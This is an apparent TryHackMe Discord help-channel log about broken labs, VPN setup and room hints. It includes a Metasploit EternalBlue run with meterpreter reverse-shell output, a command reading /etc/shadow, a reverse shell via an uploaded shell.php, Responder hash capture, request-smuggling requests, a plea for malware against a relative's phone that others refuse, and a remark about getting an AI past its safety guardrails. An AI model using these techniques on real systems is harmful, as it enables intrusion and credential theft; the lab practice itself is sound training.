Hi everyone, i have a issue with Res challange. xxd binary does not have the SUID bit setted. I restarted three time the target machine but the issue persists.

www-data@ip-10-114-175-93:/var/www/html$ ls -l /usr/bin/xxd 
-rwxr-xr-x 1 root root 18712 Apr  2  2025 /usr/bin/xxd
www-data@ip-10-114-175-93:/var/www/html$ xxd /etc/shadow | xxd -r
xxd: /etc/shadow: Permission denied

This is a known issue and has been reported to THM Staff

i think it's safe to say with the growing backlog of broken labs, it is prudent to conduct a search in the discord channels for "known issues" before wasting time on a lab that will rabbit hole you, especially labs over a year old.

I'm on Upload Vulnerabilities room and it keeps telling me the only two pages that im suppose to have access to im not having access to so i cant finish my task.

so many broken labs

nevermind i forgot to use the -x to search for filenames and just manually went to magic.uploadvulns.thm/assets/shell.php to get the reverse shell

@storm drift Please slow down. Further spam will result in a short timeout.

is Exploitation Task in room https://tryhackme.com/room/metasploitexploitation broken? the hint says this is the vulnerabilty (https://www.exploit-db.com/exploits/43970) but the nmap scan says it's linux. I already tried the windows/smb/ms17_010_eternalblue exploit and it did not work.

are you scanning the right ip? i remember having to close the target and attack machine on that one because it bugged out

is this is a Linux machine? you are scanning...

@storm drift because eternalblue works on Windows, not linux.

see Target IP of your metasploitexploitation room, and scan it with nmap. and show me screenshot.

it is not working because you are scanning a Linux machine with windows exploit.

just verified its working from my machine but does not follow the instructions given in the task precisely

i used this payload
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

[*] 10.65.170.244:445 - Trying exploit with 17 Groom Allocations.
[*] 10.65.170.244:445 - Sending all but last fragment of exploit packet
[*] 10.65.170.244:445 - Starting non-paged pool grooming
[+] 10.65.170.244:445 - Sending SMBv2 buffers
[+] 10.65.170.244:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.65.170.244:445 - Sending final SMBv2 buffers.
[*] 10.65.170.244:445 - Sending last fragment of exploit packet!
[*] 10.65.170.244:445 - Receiving response from exploit packet
[+] 10.65.170.244:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.65.170.244:445 - Sending egg to corrupted connection.
[*] 10.65.170.244:445 - Triggering free of corrupted buffer.
[*] Sending stage (232006 bytes) to 10.65.170.244
[*] Meterpreter session 1 opened (192.168.145.206:4444 -> 10.65.170.244:49353) at 2026-03-25 23:00:40 -0700
[+] 10.65.170.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.65.170.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.65.170.244:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > 

maybe he's scanning his own IP. because that nmap result shows Ubuntu machine.

agreed plus needs the correct options:

msf exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.65.170.244    yes       The target host(s), see https://docs.metasploit.com/docs/using-metaspl
                                             oit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.145.206  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   3   Windows Server 2008 R2

The attackbox machine IP is on the LHOST of the screenshot. No I'm not scanning my own IP lol. That's why I pointed out the hint stating the vulnerability because I'm aware ms17_010_eternalblue is a windows exploit. I will try to terminate the target machine. Maybe it's just a bug or I have not terminated the machine of the previous task.

I will try this payload too.

TARGET IP should be on RHOSTS.

attackbox machine should be the LHOST. The target machine is RHOSTS. lol

i'm just here to provide a "sanity check" - it's not broken

that's what i'm saying.

yes so I'm not scanning my own IP 😉

maybe scanning different TARGET machine. because your nmap results shows Ubuntu there, check properly.

Yes that is what I'm doing now. I have terminated the old target and spinning up the new one. 🤞

thanks

looks like terminating target machine and starting a new worked

thanks too @peak veldt

Gave +1 Rep to @peak veldt (current: #3698 - 1)

Thanks

Gave +1 Rep to @vagrant fern (current: #12 - 921)

Hey everyone, i got stuck in https://tryhackme.com/room/monikerlink
exploitation part
i want to use my own kali machine to attack the windows machine , can someone help?

okay, so download opnv conf file from https://tryhackme.com/access. and install openvpn in your kali machine by sudo apt install openvpn, then connect your downloaded vpn conf file with command, sudo openvpn <path to .ovpn>

I am done with that actually

Just finding how to get me responder to listen and get me the netNTLMv2 hashes

means you want to conf responder to listen on THM network?

change the interface then, try with tun0

like sudo responder -i tun0 -dwv

Yes

Tried it but it ain't working, but i did without dwv

as you are doing this room which needs to leak NTLM, so you should have apply these flags to work with it --dw and -v is to see if any issue happens you will get what doesn't work.

Hey it worked, was using different interface ip , I am dumb sry

What exactly is dw and v

V is verbose ig

yes.

i already told, -dw is must for this NTLM to get Leak.

Ah okay

i recommend everytime use -v it's developers trait.

for every command.

Its for verbose right?

yep.

Well u am totally new to these concepts, so I didn't kn

But would it work if i use VPN in base machine to connect with thm and then use eth0 from Kali??

using your own machine, but with eth0 interface, would be one way connection. means Your machine IP coudn't reach TARGET IP.

because interface tun0 allows to connect your machine with THM networks by giving you a specific THM ip.

so tun0 is the only thing, your actual machine can communicate with your THM target machine.

Ah okay , but then how does she connection works?

How does the VPN connect to the THM machines?

you can use "man <tool>" if they have a manual entry or almost every command line tool has a --help or -h to see options with explanations

Hey guys, not sure if this is the place to ask for help but I'll fire away anyway.

I'm hosting a KotH on TryHackMe and the openvpn file downloaded doesn't work when doing "sudo openvpn KotH.ovpn".

I've tried updating/upgrading my Kali machine and regenerating the VPN file after switching regions.

It doesn't create the tun0 interface and hangs at VERIFY OK. Some of those connected could use the VPN while others like myself couldn't.

Any ideas?

Which country are you in?

UK

Regions I tried are Frankfurt and Ireland.

how are you connecting?

At the KotH page it gives a "Download VPN Config" button. I get the openvpn file from there and do "sudo openvpn KotH.ovpn"

In your Kali VM?

Yes.

Which sot of network are you connected to?

Is there another network to connect to as well? I just attempt to connect to the network via the openvpn file from the KoTH page.

No, I meant, are you on a home network, Org or educational?

Oh, hotspot. But I can openvpn to your regular machines fine.

And another KotH player is on home network and they can't connect

PS: the machine has ran out on time, I'm making a new session so I can see what the problem is for next time I host it.

Starting a new session should resolve it

Yeah I can't host a session by myself to check or anything and the other players have left. I'll hop in here if I have the same issue again in the future, cheers.

Edit: This was attempted across two sessions, so changing sessions did not work.

There were also differences in the config files that did work and those that didn't. For example, the recv/send buf was 0 on the files that didn't work but 52240 (iirc) on those that did, different servers in very different options ranges, etc.

it is likely a config network mismatch regenerate the config from the new session or maybe it is probably a THM side issue

Thanks for this. I know where I was going wrong now, I was typing https instead of http! 😫

Gave +1 Rep to @grave rover (current: #3698 - 1)

Hey everyone 👋
I’m currently learning cybersecurity (just started building my portfolio) and working through labs on TryHackMe.

I’ve completed a basic internal security audit project using the NIST Cybersecurity Framework, and I’m trying to structure my portfolio in a way that aligns with industry expectations.

I wanted to ask:

• What kind of projects do employers actually look for in entry-level cybersecurity portfolios?
• Is it better to focus more on hands-on labs (like TryHackMe) or structured reports (like audits and risk assessments)?
• Are platforms like GitHub or Notion preferred when presenting a portfolio?

Any advice or examples would really help 🙏

I really want to learn coding and tech but I need help pls

good! and what kind of help can i do?

If you have any questions ask away

Hey I was doing the CyberHeroes room. The room says that the answer is a way to bypass the authentication. I did a XXS and SQL injection on it. It didn’t work. Any other tipps to bypass the authentication?

Hi

Just in case anyone else finds this; you can run history in each tmux session to find a command with the root password.

wreath 10.200.180.150 not working at all, I tried reset, new vpn etc. before I couldn't acces any of the named ports

100 also

Hello everyone. Can anyone help me fix the issue I am facing? I have contacted customer support and waiting for a response but if I can fix it asap, it would be awesome. I'm in a room linux fundamentals part 1 and when I run virtual machine using start machine button, I end up getting different directories than it shows in tutorials. I am pretty sure that folder1 folder2 folder3 are the directories I created while following different tutorials but now Idk why it shows here. I have tried like 10 times to terminate machine and restart it, ssh into ip address it shows in target machine information tab but nothing helps. Can anyone guide me where I can get help from?

could you show me screenshot? what machine are you running? because target machine always gets resetted after termination.

I am sending you pictures

Why get a career in cyber:

High demand: over 3.5 million unfilled roles.
Strong salaries: competitive pay even at entry level.
Constant learning: the field evolves fast.
Are you ready to learn more about some of the leading roles involved in cyber security? Let's begin!

Answer the questions below
How many unfilled cyber positions are there?

Pls can someone help me solve this,i choose over 3.5million and its still wrong.

which room are you on?

Damn man are you alive

Bonsoir

bonsoir

Deleted Message

Deleted Message

Deleted Message

Deleted Message

Relax bro 💀 I am not ignoring you I was busy

hop to dms

hello guys

As per the "Windows Fundamentals" topic rewind recap, what do starting TryHackMe machines have to do with setting up a real-world installation of Windows in an AD environment?

hello guys, did anyone of you finish the room called el bandito?

that shit is hard

hello>??

Hello. i finished it 2 yrs ago, hardly remember it, pun intended, to be fair it is ranked "Hard", so nothing shocking there.

Windows Local Persistence how has a normal user the rights to change some administrative groups like adding to a new group? or using secedit? In my experience thats the reason for bloodhound and lateral movement, but the room acts like thats total normal?

sorry guys for coming like that but, for the soc simulators, is there a way to copy something from the alert queue and paste in the analyst's VM ?

Example in the room:
GET /socket HTTP/1.1
Host: 10.114.163.202:8001
Sec-WebSocket-Version: 777
Upgrade: WebSocket
Connection: Upgrade
Sec-WebSocket-Key: nf6dB8Pb/BLinZ7UexUXHg==

GET /flag HTTP/1.1
Host: 10.114.163.202:8001
but the right server is:
GET /socket HTTP/1.1
Host: 10.10.233.72:8001
Sec-WebSocket-Version: 777
Upgrade: WebSocket
Connection: Upgrade
Sec-WebSocket-Key: nf6dB8Pb/BLinZ7UexUXHg==

GET /flag HTTP/1.1
Host: 10.10.233.72:8001
How is that possible???

room: Request Smuggling: WebSockets

the proxy is supposed to devliver the request to the webserver? but there are two proxies? wtf?

lol...there are a lot of different server, and the named never works

morning hackers

I am facing a config file problem. What do I do? this room: "https://tryhackme.com/room/lateralmovementandpivoting

Anyone any recommendations for pentesting I am just a beginner what should I start with?

Hi, I’m a beginner in cybersecurity. How should I start?

Hey, hello everyone.
I'm having trouble accessing the attack server.
https://tryhackme.com/room/uploadvulns

This is the room. I configured the hosts file exactly as instructed, but I still can't access it.
I checked the traffic in Burp, and the target hostname is included in the Host header, so I'm not sure what the problem is.

If anyone has a moment, I'd appreciate some help.

Hey can anyone explain what are NOPs and what do they mean by consistent payload sizes?

Pre security room then cyber 101 ig

Room: Windows Basics
Issue: VM freezes after launch / becomes unresponsive
Tried: multiple restarts, different sessions.
Other rooms (Windows CLI) work fine. (Hope some one could fix this area, thank you)

U could use rdp from your own base machine

hey is there anyone who can help me out in erasing all the data from someone else's phone?
it's really urgent

happens, connect your own machine with openvpn and just use RDP(for windows) or remmina(for Linux) to connect Windows VM

Lmao.

Why?

well, everything is correct but still instruction page on each domain. Same issue after testing. maybe room issue

somebody is blackmailing me

that's why

How are they doing that?

by the video of mine

can anyone help me sending any kind of malware or something?

What's the video?

How do you know they have it?

she's my aunt

Lmao.

Call the cops.

that's not possible...my mother knows about it but my father doesn't

i can't just call the cops

Yes you can.

Black mail is illegal.

And if a mother is letting this happen, tell your dad.

yeah i know....but i don't want my father to know about it

my mom is supporting me....

So why isn't your mum doing shit?

because my mother does'nt know hacking

doesn't*

can anyone help me....

i can't just explain the whole situation...it's complicated

Same here my mom also doesn't know about hacking and my father knows

Can't your mum tell her to delete the video?

Or take the phone?

its really urgent

Nobody is going to hack a phone for you.

no....she'll tell my father about it

my aunt

Tell your dad yourself then.

Remove the blackmail

atleast can create a malware....

Nobody will do that for you either.

if you tried to hack phone, then you will be the accused. so instead of exploiting others, try to defend yourself, yeah raise a complaint.

Is the phone an android?

yes

she can't....

Then the chances of the back up being uploaded to a G drive is high

@plush saddle can you please re explain the problem, with a little more detail than "im being blackmailed"

They can't.

It's no point.

Nothing we can do

In a case like this the obvious answer is call the cops. Blackmail is illegal and so is unauthorized access to systems you dont own.

If you need to wipe data and you OWN the phone being wiped, turn off autobackups, go delete your backups on google, delete everything in your drive, delete everything off the phone, and if you really need to wipe it just brick it and get a new phone.

Im not gonna sit down and write you a tutorial on the obvious though. Ask ai how, if you can get past the safety guardrails. If not, accept your fate or call the cops.

It's not their phone, so all that is useless.

Oh LMFAO

How tf Lil bro even end up in this situation XD

Who knows.

Questionable on what video the aunt has.

Thats what im saying I need the lore drop

I don't think we need know what the video is, and why the aunt as such a video.

Idk bro Im invested now 🍿

Jk jk

Hello, in room networking core protocols, in POP3 task, i can't retrieve the flag. Can someone help me please? im usin openssl s_client -crlf -connect 10.114.172.168:995 and it gives output +OK Dovecot (Ubuntu) ready. USER linda +OK PASS Pa$$123 +OK Logged in. RETR 4 RENEGOTIATING ERROR 40C74ED6597F0000:error:0A00010A:SSL routines:can_renegotiate:wrong ssl version:../ssl/ssl_lib.c:2892:

What room is that btw? Didn't know there was a ctf where you have to hack your aunt's phone to delete all her data. Sounds quite hard

https://admin.tryhackme.com/Hack-The-Blackmailer

Based

This response is peak culture

Hey everyone, can anyone help me with notes of cyber security 101 rooms , I am not very good at making notes , so was just hoping if there is any resource that could help

Do the work. Taking notes is a skill you have to practice, and it funnels into report writing which is a quintessential skill for red and blue team both

You have to practice. Look up good note taking habits and try to put them into practice. Document workflows and make yourself commandline cheat sheets. You will get it bro ❤️

It was daunting for literally every one when they started. @covert bloom just keep working at it

😭 thanks for reply

Gave +1 Rep to @analog heath (current: #891 - 8)

Hello, in room networking core protocols, in POP3 task, i can't retrieve the flag. Can someone help me please? im usin openssl s_client -crlf -connect 10.114.172.168:995 and it gives output +OK Dovecot (Ubuntu) ready. USER linda +OK PASS Pa$$123 +OK Logged in. RETR 4 RENEGOTIATING ERROR 40C74ED6597F0000:error:0A00010A:SSL routines:can_renegotiate:wrong ssl version:../ssl/ssl_lib.c:2892: can anyone help please?

use that command with -quiet flag.

and on port 110

openssl s_client -connect 10.49.155.136:110 -starttls pop3 -quiet @smoky dew

Thank You! I'll try it tommorow 😊

Did they change it so that when you answer a question correctly, it grays out the answer you can't see what you put?

Probably not.

@full token me puedes ayudar con una problema de filtro en wireshark?

hi

hi

Pls I need friend am from Nigeria

What is the difference between a bash and a shell

bash is a language and also the name of the corresponding command-line interpreter.
a shell is a generic term for a command-line interface, which can include bash, sh, ksh, python, etc.

@gleaming oxide thanks bro

Gave +1 Rep to @gleaming oxide (current: #149 - 74)

shell - bash = 122

ASCII values for each character:

bash
b = 98
a = 97
s = 115
h = 104

bash = 98 + 97 + 115 + 104
bash = 414
shell
s = 115
h = 104
e = 101
l = 108
l = 108

shell = 115 + 104 + 101 + 108 + 108
shell = 536

room https://tryhackme.com/room/catpictures, we're supposed to port knock ports: 1111,2222,3333 & 4444 to open ftp. BUt 'knocking' them doesn't do anything. Is this room broken??

Possibly. Ton's of broken rooms already so wouldn't be surprised.

Hello, I'm having a problem with the room, specifically regarding how websites work. I need to inject HTML code to display a given site on the page of the vulnerable website. I tried entering the credentials I found in the source code, and right after that, I tried using the <a> tag etc., but it's not working.

Can you share with room?

I can't send a screenshot, it's one of the first rooms for beginners, so I think it should be relatively simple, but I'm stuck.

the room "how website work" injection html

https://tryhackme.com/room/howwebsiteswork

You'll need to verify your account to be able to send an image or screenshot

@strange bramble

ok ! thanks

Hi

yep?

I need a Hel

P

Describe what type of help you need and folks who are familiar would jump in.

I want to know about email spoofing

For which purpose is this?

I will explain wait

If iam sending a email to u any in the middle is changing the content of it and then u will get a changed email

that's MITM.

What does it mean

Man-In-The-Middle attack.

where you may change content of traffic

if it's poorly encrypted.

Oh

Thx

Hey guys. Im very new to backends and commands and stuff. Any that can help me with not just MDM but DEP on a MacBook Pro with M4? I know there’s a script for it, but I don’t think it completely takes it off the Apple servers. if that is possible you need help.

i'm stuck on snapped phish-ing line, can't find the answer from question 5. I tried to use virustotal in order to get the sha256 of the file. But I just have the url, with http://..... So I can't get a sha256 from an url. I need to get it from the real file.I thought it was the same thing as the url without the "http://" but it seems that's not like that. If someone can help me to find out !

Hey all, I'm stuck on Linux Fundamentals Part 3: Task 8 - Maintaining Your System: Logs
I've navigated into the apache2 logs location in a terminal, and I'm stuck on the question "What is the IP address of the user who visited the site?

root@ip-10-128-69-204:/var/log/apache2# cat access.log
root@ip-10-128-69-204:/var/log/apache2# cat access.log.1
127.0.0.1 - - [06/May/2024:23:54:15 +0100] "GET / HTTP/1.1" 200 3477 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
127.0.0.1 - - [06/May/2024:23:54:15 +0100] "GET /icons/ubuntu-logo.png HTTP/1.1" 200 3623 "http://127.0.0.1:81/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"
127.0.0.1 - - [06/May/2024:23:54:15 +0100] "GET /favicon.ico HTTP/1.1" 404 487 "http://127.0.0.1:81/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0"

The access logs only have the local ip in them

Have I missed something? 🙂

You're looking at the wrong file.

Oh I was mirroring from the video

Ahhh got it, it was because I wasn't SSHed in. Forgot I disconnected lol

Hi guys can someone help me learn game hacking for android like unlimited money

Hello pls anyone

Works! Thank you! I've lost 20 minutes trying to find right command ;_;

Gave +1 Rep to @analog heath (current: #818 - 9)

Can someone help me with Task 2 of this room(https://tryhackme.com/room/owasptopten2025two)

I went to the link I thought I was supposed to go to ( http://10.81.146.116:5002/api/user/123) yet didnt find the flag:

/api/user/123 is just a test
Change the user ID until you hit admin/flag data

Thanks! Where can I find the pre security room? Or Is that on TryHackMe website?

Gave +1 Rep to @covert bloom (current: #3702 - 1)

Its in tryhackme only , ig some of the rooms are free in pre security, u can try those

`XXE.Injection.v.1.4-badr

` this room server is unreachable from my machine connected through VPN.

Pre-security is the whole path in THM

https://tryhackme.com/path/outline/presecurity

Hey guys I am on doing crack the hash level 2 and wordlistctl doesnt seem to be installed on the attackbox

type just, wordlists

if this is an attackbox, your rockyou.txt will be on this path /usr/share/wordlists/rockyou.txt

fml I am so dumb

hmmm its looking for another directory in the path

it worked?

it showed the path and when I do ls it shows it but the answer is looking for another directory within the path

/usr/share/wordlists/something/rockyou.txt

yeah it only shows path. so copy that path and change dir to that.

or instead.

be on the current directory, just map out your wordlists full-path like -w /usr/share/wordlists/rockyou.txt

done.

@fading wigeon still confused? show me output of worlists i will give you command.

yeah a little confused

ls

that's your wordlists directory. and there will be rockyou.txt

yep

but the answer is looking for 5 branches in the path whereas that is only 4

including rockyou.txt

which task are you on? and yeah tree branches of wordlists doesn't matter.

task 3

task 3 assumes I can use wordlistctl when I cant

nvm nvm

I am an idiot

although the last question task 3 seems to need wordlistctl

which room are you doing? send url

https://tryhackme.com/room/crackthehashlevel2

was I supposed to install it myself?

wait.

The answer won't be obtained due a change in the Attackbox.

Rockyou used to be in a directory called passwords.

so you are on attackbox, and here its apt repo handler. so try if it works, because i had an arch with blackarch repo, so its easy to install sudo pacman -S wordlistctl for me.

or you need to install it manually on your machine.

@fading wigeon try sudo apt install wordlistctl

will do I am just gonna restart the attackbox just in case

not needed.

as there is no wordlistctl installed, so you need to install it first.

let me check how you can install it in debain based distro.

@fading wigeon

unable to install it

git clone https://github.com/BlackArch/wordlistctl.git
cd wordlistctl

that did it

after this

chmod +x wordlistctl.py
sudo cp wordlistctl.py /usr/local/bin/wordlistctl

sudo cp repo.json /usr/local/bin/repo.json

and check it if it's working wordlistctl list

looks like it

did you ran all command i just sent?

yep

try this now.

that was the screenshot I sent

okay, it's successfully installed, now try your tasks questions.

that did it thank you

Can someone help me with Task 4 of this room? I am almost there but not really
Screenshot is from Cyberchef

https://tryhackme.com/room/owasptopten2025two

Is there a similar mode? (also double-check the latter part of your key)
The setup in your screenshot seems to match my notes from when I did it.

Thanks I fixed it. I had an extra space that was messing up my results

Gave +1 Rep to @gleaming oxide (current: #146 - 75)

Hello everyone!

i'm trying the room : https://tryhackme.com/room/devdiaries
I took the subdomain with censys website. It looks to be || uat-testing.marvenly.com ||
But, when i go on this website nothing appear, like if the website doesn't exists. is this attended ?

yes, intended- the lab is OSINT themed, be open, be intelligent;)

But .. I tryied to see online if someone can open the hidden website and i found someone who can open it on youtube ..

like, the subdomain can not be resolved on my computer

main website sure, it cannot be open and we don't need to

but the subdomain too ?

to be clear, the site is not live and not needed to solve any of the lab, a clue on the way to the goal is all - happy hacking;) EDIT: looking into this closer, this part of the lab (live subdomain) is currently broken. However, there are other ways to get to the same goal in the end;)

is anyone available to help me unstand why this flag won't input properly | I'm in the SOC L1 Alert Triage room task 5 question 1. I got the flag after completing the triage however it's putting the underscore one space before it should go and throwing off the whole flag?

I got it, I didn't realize that we were getting a flag for every alert, I thought is was all one flag

Hello!

Hello!

hey everyone , i just trying to exploit the Metasploit vm in the following room
https://tryhackme.com/room/metasploitexploitation
i tried ftp_login didn't work and got access through smb but no confidential files and also tried http port but just a waste website
can anyone help?

Hey chat

Check out service versions and see if they are vulnerable to some known exploit

i need help

what type of help?

some hacker stole my all money and my son in hospital i need money for his treatment.i tried every thing but no one help me

my friend ask me join discord and tell your problem some one definatly help

really?

tell the cops

Maybe this is social engineering practice :))?

such poor technique 😂

@scenic spruce FR if money had stolen physically then what could a discord stranger can do for u?

file a complaint!

That why he try to develop it:)))

in pakistan no one is listin if you need launch fir you need lots of money to give them after that he can launch fir

but bruh! your money is stolen, so no way you asks help in online platform, no one can help.

ok

if it was Hacked, then maybe.

yes some one hack my account and stole my money

topic changed instantly😂

sorry bro you dont know my situation my broteher in hospital and my account is empty some hacker stole it and no one help me.like you laughing

if account is compromised, then contact your bank or a cyber police. it's free to file a complaint, don't gonna lie.

i will try every thing nothing happend

"Widows Basics" i am doing and the VM is giving me trouble to finish it.. I am Task 3 "Configuring & Securing Windows" but i cant complete room thanks to that VM... Other task i was able to do by terminating like 100 times and getting info slowly to other tasks.. But i cant finish the room..

where you stucked?

Hhh frusraiting

Task 3

I tried openVPN but that didnt help either

so now, what are you using? Target Machine or a openvpn connected to it?

stop everything, start it now. let me know once it's boot completed.

Now

started?

It works for some time then it freezes totally (Cant click on anything) after few clicks and it is stuck

yeah, windows machine usually behaves like this in THM VM.

All other VM:s so far has worked

Will they repair the problem if i aint the only one? Just saying